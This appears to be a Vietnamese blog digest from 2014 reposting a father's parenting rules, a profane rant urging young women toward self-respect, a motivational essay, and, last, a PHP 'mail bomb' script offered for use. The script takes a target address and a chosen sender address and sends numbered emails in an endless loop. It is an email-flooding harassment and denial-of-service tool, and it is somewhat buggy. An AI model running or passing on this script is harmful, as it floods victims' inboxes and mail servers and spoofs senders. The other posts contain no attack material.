Wednesday, August 6, 2014

Bí quyết dạy con của vợ chồng có 12 con học đại học

Bí quyết dạy con của vợ chồng có 12 con học đại học


Bí quyết dạy con của vợ chồng có 12 con học đại học

Posted: 06 Aug 2014 12:09 AM PDT




Bài viết là những chia sẻ của ông bố Francis L. Thompson (Utah, Florida và California) về cách nuôi dạy con.

Vợ chồng tôi sinh được 12 đứa con trong vòng 15 năm rưỡi sống chung. Hiện tại, đứa lớn nhất 37 tuổi, đứa nhỏ nhất 22 tuổi. Tôi có một công việc kiếm được và đủ tiền để cung cấp gần như mọi thứ cho bọn trẻ. Nhưng vợ chồng tôi đã không làm như vậy.

1. Làm việc nhà

Các con tôi biết làm việc nhà từ lúc 3 tuổi. Một đứa trẻ 3 tuổi có thể không dọn toilet sạch sẽ nhưng khi lên 4 tuổi, chúng sẽ làm khá tốt.
Trẻ được nhận tiền công cho những việc mà chúng làm.
Chúng tôi yêu cầu con giặt quần áo từ lúc lên 8 tuổi

2. Thời gian học tập

Giáo dục rất được coi trọng trong gia đình tôi.

Chúng tôi quy định thời gian học từ lúc 6 giờ chiều tới 8 giờ tối mỗi ngày trong tuần. Không tivi, không máy vi tính, không trò chơi điện tử, hay những hoạt động khác cho tới khi 2 giờ học tập kết thúc. Nếu trẻ không có bài tập về nhà, thì chúng sẽ đọc sách. Với những đứa chưa đi học, sẽ có người đọc sách cho chúng nghe. Sau 2 giờ này, trẻ có thể làm bất cứ việc gì mình muốn miễn là không phá vỡ lệnh giới nghiêm.

3. Không kén cá chọn canh trong ăn uống

Cả gia đình đều ăn tối và ăn sáng cùng nhau. Bữa sáng bắt đầu lúc 5h15', sau đó bọn trẻ phải làm việc nhà trước khi tới trường. Bữa tối bắt đầu lúc 5h30 phút chiều.
Đôi khi chúng ta ghét những thực phẩm tốt cho sức khỏe. Quy định của chúng tôi là cho trẻ ăn loại đồ ăn mà chúng ghét trước tiên (thường là rau), sau đó sẽ ăn tới loại kế tiếp.

4. Hoạt động ngoại khóa

Tất cả các con tôi đều phải chơi một vài môn thể thao. Các con có thể tự chọn môn. Chúng tôi bắt đầu thực hiện quy định này khi trẻ đi học. Không quan trọng đó là bơi lội, bóng đá, bóng chày, đấu kiếm, hay tennis và chúng tôi cũng không quan tâm nếu trẻ muốn thay đổi môn. Chúng tôi chỉ cần biết là trẻ phải chơi một môn nào đó.
Tất cả các con cũng đều phải tham gia một hội nhóm, câu lạc bộ nào đó như câu lạc bộ lịch sử, câu lạc bộ kịch...
Chúng tôi cũng sẽ tham gia các hoạt động tình nguyện trong cộng đồng hay ở nhà thờ.

5. Tự lập

Khi trẻ đủ 16 tuổi, chúng tôi sẽ mua cho mỗi đứa một chiếc xe hơi. Điều đầu tiên trẻ học được trong việc này là gì? Khi chiếc xe tải kéo tới một chiếc xe cũ, đứa lớn nhất của chúng tôi đã hét lên: "Bố, đó là một chiếc xe sắt vụn!" Tôi nói: "Đúng thế, nhưng nó là một chiếc Mustang fastback 1965. Đây là hướng dẫn sửa chữa. Dụng cụ ở trong gara. Bố sẽ trả mọi bộ phận cần phải thay thế, nhưng sẽ không trả tiền công thợ". 11 tháng sau, chiếc xe đã được tu sửa như mới. Con gái tôi (vâng, là con gái) sở hữu một trong những chiếc xe hấp dẫn nhất trường trung học. (Thêm một điều nữa là các con tôi chưa có đứa nào phải nhận vé phạt vì đi quá tốc độ, mặc dù không có chiếc xe nào dưới 450 mã lực).

Mỗi đứa đều có 1 máy vi tính riêng, nhưng các con phải tìm cách lắp máy. Tôi mua bộ vi xử lý, bộ nhớ, bộ cấp điện, case, bàn phím, ổ cứng, bo mạch chủ và chuột. Chúng phải lắp các bộ phận lại với nhau và tự tải các phần mềm về. Các con tôi phải làm việc này khi 12 tuổi.

6. Cho phép sai lầm

Chúng tôi cho phép các con phạm sai lầm. Năm Samuel 11 tuổi, tôi từng bảo thằng bé thay dầu xe và hỏi xem cu cậu có cần giúp đỡ hay hướng dẫn không. "Không, bố ạ. Con có thể làm được" – thằng bé nói như vậy. Một tiếng sau, Sammuel tới gặp tôi và nói "Bố, có phải sẽ mất 18 lít dầu không?"
Tôi hỏi con đã đổ 18 lít dầu vào đâu trong khi thường chỉ mất 5 lít. Sammuel trả lời: "Ở chỗ đinh vít lớn trên đầu phía trước động cơ". "Ý con là tản nhiệt à?" Chà, thằng bé đã thực sự gây rắc rối khi đổ đầy dầu vào tản nhiệt.
Chúng tôi đã cùng nhau sửa lại và không có bất cứ hình phạt nào được đưa ra. Chúng tôi cho phép sai lầm xảy ra để rút ra bài học. Con cái chúng tôi không bao giờ phải sợ khi thử cái gì đó mới. Chúng sẽ học được nếu chúng làm sai và sẽ không bị phạt. Việc này tốn của chúng tôi khá nhiều tiền, nhưng chúng tôi đang nuôi dạy con cái, chứ không phải đang tiết kiệm tiền.

7. Được quyền lựa chọn

Chúng tôi cho phép các con đưa ra lựa chọn riêng nhưng có giới hạn. Ví dụ, con có muốn đi ngủ hay dọn dẹp phòng không? Hiếm khi chúng tôi đưa ra những chỉ thị chỉ có một lựa chọn trừ khi đó là quy định đã được thống nhất trong nhà. Điều này khiến trẻ cảm thấy mình có một số quyền hạn trong cuộc sống.

8. Giúp đỡ nhau

Chúng tôi yêu cầu các con giúp đỡ nhau. Đứa lớn có thể giúp đứa bé làm bài tập về nhà hoặc hoàn thành việc nhà. Chúng tôi cũng cho phép trẻ tham gia vào việc đưa ra các quy định trong nhà. Ví dụ như bọn trẻ muốn đồ chơi không được phép để ở phòng sinh hoạt chung, mà phải để ở phòng ngủ hoặc phòng chơi. Ngoài việc nhà, trẻ phải lau dọn phòng ngủ của mình hằng ngày. Đây là những quy định mà bọn trẻ muốn. Chúng tôi cho phép trẻ mỗi tháng chỉnh sửa hoặc đưa ra những quy định mới. Tất nhiên, chúng tôi có quyền phủ quyết.
Chúng tôi luôn cố gắng nhất quán. Nếu quy định phải học 2 tiếng mỗi tối thì chúng tôi sẽ không cho phép ngoại lệ xảy ra. Lệnh giới nghiêm là 10 giờ tối và tới 12 giờ vào những ngày không phải đi học. Không có ngoại lệ cho những quy định này.

9. Quy định đi nghỉ

Mùa hè nào chúng tôi cũng đi nghỉ khoảng 2-3 tuần. Chúng tôi có đủ tiền để thuê khách sạn, nhưng chúng tôi không chọn cách đó. Chúng tôi đi cắm trại hoặc du lịch bụi.

10. Tiền bạc

Ngay cả khi có tiền chúng tôi cũng không giúp con cái mua nhà, trả học phí hay chi trả cho lễ cưới. Chúng tôi tư vấn cho con cách để làm những việc đó, chứ không làm hộ chúng. Chúng tôi giới thiệu con cho các công ty nhưng chúng phải tự vượt qua vòng phỏng vấn để có việc làm.
Chúng tôi vẫn tặng quà sinh nhật và Giáng sinh cho con, vẫn nói về ông già Noel nhưng khi con lớn hơn, chúng tôi sẽ không nói dối nếu chúng hỏi.

11. Cuộc đời thực

Chúng tôi yêu con cái bất kể chúng có làm việc gì đi chăng nữa. Nhưng chúng tôi sẽ không ngăn ngừa hậu quả từ những việc con làm. Chúng tôi để cho con gánh chịu hậu quả và không cố làm giảm thiểu hậu quả khi thấy con đau buồn. Chúng tôi có thể khóc và buồn nhưng sẽ không làm bất cứ việc gì để giảm thiệu hậu quả từ việc làm của con.

Chúng tôi là bạn tốt nhất và cũng không phải là bạn tốt nhất của con. Chúng tôi là phụ huynh.

http://vietnamnet.vn/vn/giao-duc/187...c-dai-hoc.html








----------
Nguồn www.yeuquangngai.net

đàn Bà Giá Rẻ Và đàn ông Vứt Mẹ Nó đi!

Posted: 04 Aug 2014 03:12 AM PDT




Có cô gái nhỏ hỏi tôi trên ask: Giữa một cốc nước mía có mùi nước tiểu và một cốc nước tiểu có mùi nước mía: anh chọn cốc nào?
Tôi đã rất phẫn nộ!
Thực sự phẫn nộ!
Tôi tự hỏi: Làm sao mà có quá nhiều những cô gái rẻ rúng bản thân mình đến vậy?


Cốc nước mía kém chất lượng hay cốc nước tiểu thượng hạng thì cũng vẫn là thứ bỏ đi! Không ai uống cái loại nước ấy! Chỉ có những cô gái tự hạ giá mình, rẻ rúng mình, tự sỉ nhục mình thì mới lựa chọn!

Còn không, mọi cô gái nhỏ phải nhớ: Em là một CON NGƯỜI với lòng TỰ TRỌNG và những GIÁ TRỊ của mình!

Em có thể xấu như ma, có thể khuyết tật, có thể béo, có thể ngọng, có thể chưa có gì nổi bật đi nữa thì điều đó không có nghĩa là em đại hạ giá em, rẻ rúng em, cho phép người khác coi thường em!

Không!

Không!

Trăm lần không!

Vạn lần không!

Tỉ lần không!

Em ạ!

Anh muốn tát một cái thật mạnh vào mặt em!

Để em tỉnh lại!

Đừng làm thứ đàn bà rẻ mạt như thế!

Không ai có thể dùng tiền bắt em cởi quần ra cho họ chọc vào giữa háng!

Không ai có thể dùng tình yêu giả mạo để bắt em quỵ luỵ cầu xin van vỉ tình yêu, giữ chân họ bằng mọi cách!

Không ai có thể bắt em phải lựa chọn thứ xấu vừa và thứ xấu tệ!

Không ai có thể bắt em phụ thuộc họ!

Tuyệt đối không!

Đừng nói bất cứ lời biện minh nào cho việc em bất chấp lòng tự trọng của mình!

Em có thể dại khờ ngốc nghếch chứ không thể là thứ mặt trơ trẽn!

Em ơi!

Nhớ này!

Em phải được nhận điều tốt đẹp nhất! Một thằng đàn ông yêu em, sẵn sàng vì em và đi cùng em chứ không phải một thằng đàn ông ra lệnh cho em, bắt em phải phục dịch gã, bắt em phải làm tình với gã nếu tin gã hay yêu gã! Không! Thằng đàn ông nào không làm được điều đó thì ném mẹ nó đi, vứt cụ nó đi! Thứ đàn ông nào mà dám coi thường em? Luc chúng nó có khác gì em? Cùng mẹ đẻ ra không lẽ chúng được mẹ ngọc mẹ ngà còn em là con của mẹ ngu mẹ dốt ư? Thế nên không cho phép chúng coi thường em cũng chính là không cho phép chúng coi thường bố mẹ em, họ hàng nhà em!

Em làm tình với ai là vì em thích, em muốn chứ không phải là để chứng minh tình yêu hay lòng tin của nợ gì!

Em xứng đáng được trân trọng chứ không phải là cho gì ăn nấy!

Em thích thì mời ai đó đi nhà hàng chứ không phải chỉ trông đợi ai mời mình đi nhà hàng!

Em biết không? Đàn ông có dăm bảy loại đàn ông. Đàn ông tử tế không bao giờ khiến em phải khổ. Chúng mà yêu em thì chúng tận tuỵ hết mình mà chúng không yêu em thì chúng chỉ tận thu thân xác em, coi em là một loại cave cho đỡ phải thủ dâm một mình! Chúng yêu em chúng sẽ tôn trọng em chứ chúng không toan tính với em! Chúng yêu em, chúng sẽ sợ mất em chứ không phải giận nhau là bỏ mặc em, bắt em làm lành!

Hãy cho gã đàn ông đang yêu em đọc bài viết này đi! Nếu nó nói là anh nói nhảm thì chọn luôn đi: Unlike trang này hoặc chuẩn bị một cốc nước mía xịn nhất, thượng hạng nhất thay vì nước mía có mùi nước tiểu hay cốc nước tiểu vị mía! Quên mẹ nó mấy thứ hãm đó đi!

Anh yêu em và không bao giờ chấp nhận cô gái nhỏ nào như thế!

Nhớ chưa?

Nhớ chưa?

Hoàng Anh Tú








----------
Nguồn www.yeuquangngai.net

Nào Ta Cùng Tập đếm...

Posted: 04 Aug 2014 01:57 AM PDT




(Một số tâm sự của tôi) - TẬP ĐẾM

Là bởi đôi khi ta chỉ thấy những điều ta để mất mà không thấy được điều ta đang có!

Là bởi đôi khi, ta chỉ thấy lý do nước mắt ta rơi mà quên những nụ cười ta đã từng rạng rỡ!

Là bởi đôi khi ta mải đớn đau khi không có được thứ này hay thứ nọ giống mọi người, như mọi người mà bỏ qua những điều ta có mà không ai có, ta đặc biệt có mà mọi người chẳng dễ gì có được như ta!

Nào ta cùng tập đếm!

Đếm nụ cười ta đã từng rạng rỡ! Đã từng rạng rỡ nhường kia, một thời như thế! Dù người đã khiến ta cười rạng rỡ đó đã không còn thì cũng là bởi họ và ta duyên ngắn tình mỏng! Họ đến và tặng ta nụ cười! Cái mà ta đau chỉ là do ta kết luận, do ta áp vào ta! Quên nó đi! Chỉ nhớ về hạnh phúc. Và tập đếm nó mà thôi, khi nhớ về! Đếm cả những nụ cười từ những người đang còn ở bên! Họ đã khiến ta cười thế nào? Ta đã tặng lại họ nụ cười chưa? Như bố mẹ ta, như bạn thân ta, như những thứ vĩnh viễn thuộc về ta!

Tập đếm đừng quên đếm cả sức khoẻ ta đang có! Tuổi trẻ ta đang có! Kiến thức ta đang có! Nhân cách ta đang có! Lòng tự trọng ta đang có! Danh dự ta đang có...

Soi gương và tập đếm những ưu điểm ta đang có! Cơ thể tràn trề sức xuân của ta! Biết không, cả vạn người mơ ước có được ta sao ta hoài phí nó, bỏ quên nó, coi thường nó?

Ra phố và tập đếm! Những cảnh vật tươi đẹp này phải ai cũng tận hưởng được đâu, dù nó miễn phí! Bởi người cắm mặt vào máy tính, điện thoại để chạy theo những bài báo câu views, comment vỡ cả bàn phím! Bởi người cắm mặt vào công việc bỏ lỡ những thứ miễn phí này! Bởi người không có đủ thời gian để Sống, thời gian bán đi chỉ đủ Tồn Tại, Sinh Tồn! Bởi người chỉ quen trong phòng kín, hít điều hoà quên ngoài kia dù bụi bặm nhưng đó mới là đời sống thực! Đếm đi! Đếm đi! Nắng rực rỡ! Gió vi vút! Hàng cây! Góc phố! Tiếng chim! Tiếng người! Lấp lánh đấy!

Hạnh Phúc là những thứ có tiền cũng không thể mua nổi! Hoặc mua được thì cũng chỉ là hàng Fake! Như bỏ tiền mua một cái ôm nhưng không mua được hơi ấm! Bỏ tiền mua được bữa ăn no nhưng không mua được sự quan tâm, lời chúc ngon miệng hay ánh mắt nhìn nhau ngập tràn hạnh phúc! Đếm những thứ đó đi để thấy mình hơn biết bao người!

Sao cứ phải giống một ai đó?

Sao cứ phải như một ai đó?

Người có ô tô, ta cũng có ô tô nhưng sao phải ghen tỵ người đi Audi ta đi Mazda?

Người có ô tô ta cũng có xe máy nhưng sao phải ghen tỵ ô tô 4 bánh xe máy chỉ 2 bánh? Sao không nghĩ nó chỉ là phương tiện? Sao không nghĩ đến những con đường đẹp chỉ xe máy mới vào được? Sao không nghĩ ta có thể tạt vào bất cứ đâu trong khi ô tô cần tìm nơi gửi?

Nhiều nữa! Nhiều nữa!

Chỉ là ta có chịu đếm không?

Đừng đếm những nỗi buồn!

Hãy đếm niềm vui!

Những gì ta chưa có rồi ta sẽ có nếu ta đặt nó vào kế hoạch!

Những gì ta đã có biết bao người đang mơ ước có như ta kìa!

Cô gái nhỏ ơi!

Cứ mơ mộng đi nhưng mơ để bay lên chứ đừng mơ để tự vùi dập mình xuống!

Đời kia thật ngắn để mải mê buồn!

Và đời kia thật dài để hân hoan tận hưởng!

Em ơi!
Hoàng Anh Tú









----------
Nguồn www.yeuquangngai.net

Code boom mail đơn giản

Posted: 30 Jul 2014 09:16 PM PDT




Mã PHP:

<?php
@include('header.inc');
if (isset(
$_POST['submit'])) {
    echo 
'<form name="mailer" action="boom.php" method="POST"><INPUT type="submit" value="Stop" name="dung"></form><br/>';
    
#Kiểm tra thông tin nhập vào
    
if (empty($_POST['nhan'])) {
        echo 
'Xin mời nhập mail người nhận<br/>';
        exit();
    }
    else {
        
$to $_POST['nhan'];
    }
    
    if (empty(
$_POST['gui'])) {
        echo 
'Xin hãy nhập mail người gửi<br/>';
        exit();
    }
    else {
        
$from $_POST['gui'];
    }
    
    if (empty(
$_POST['tieude'])) {
        echo 
'Xin hãy nhập tiêu đề cho mail<br/>';
        exit();
    }
    else {
        
$sub $_POST['tieude'];
    }


    if (empty(
$_POST['noidung'])) {
        echo 
'Xin hãy nhập nội dung cho mail<br/>';
        exit();
    }
    else {
        
$noidung $_POST['noidung'];
        
$noidung .= ' BEAT';
    } 
#kết thúc kiểm tra
        
$headers "MIME-Version: 1.0" "\r\n";
        
$headers .= "Content-type:text/html;charset=iso-8859-1" "\r\n";
        
$header .= "From: $from\r\n";
        
$header .= "Cc: $from\r\n";
        
$i 0;
do
  {
  
mail($to,$sub.$i,$noidung.$i,$header);
  
$i++;
  echo 
"+ $i email đã được gửi đi<br/>";
  }
while (!isset(
$dung));
}
else {
?>
<h3>Nhập đầy đủ thông tin!</h3>
<form name="mailer" action="boom.php" method="POST">
<table border="0">
    <tr>
        <p><td WIDTH="90px">Người nhận:</td><td><Input type="text" name="nhan"></td></p>
    </tr>
    
    <tr>
        <p><td WIDTH="90px">Người gửi:</td><td><Input type="text" name="gui"></td></p>
    </tr>
    
    <tr>
        <p><td WIDTH="90px">Tiêu đề:</td><td><Input type="text" name="tieude"></td></p>
    </tr>
    <tr>
        <p><td WIDTH="90px">Nội dung:</td></p>
    </tr>
</table>
<p><TEXTAREA NAME="noidung" COLS="100" ROWS="25"></TEXTAREA></p>
<p><INPUT type="submit" value="Bom Mail" name="submit"></p>
</form>
<?php
    
}
    @include(
'footer.inc');
    
?>










----------
Nguồn www.yeuquangngai.net

No comments:

Post a Comment